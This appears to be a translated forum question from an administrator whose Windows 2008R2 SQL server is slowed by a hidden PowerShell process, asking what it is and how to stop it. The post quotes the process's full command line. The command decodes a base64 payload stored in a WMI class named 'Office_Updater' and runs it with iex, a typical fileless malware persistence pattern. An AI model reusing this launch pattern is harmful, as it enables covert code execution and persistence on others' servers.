У нас есть стандартный сервер Windows 2008R2, который мы используем для SQL Server. Мы собираемся перенести его на новый хост, как только выясним, почему powershell пожирает все наши ресурсы. Мы не хотим перемещать это, пока мы не уверены, что это не переместится на новый хост.
PowerShell, который работает, называет это так:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
Когда мы смотрели это на мониторе процесса, вот что он показал:
Я не уверен точно, что это делает, и я понятия не имею, как предотвратить его запуск, так как нет службы, которая, как я вижу, запускает ее.
Любые предложения о том, как остановить это или что он пытается достичь? Это убивает ресурсы на нашем сервере и блокирует его. Я не уверен, является ли это вредоносной программой или службой, которая ее вызывает, и мы просто не знаем, какая служба.
Даже представление о том, чего оно пытается достичь, поможет. Какие-либо предложения?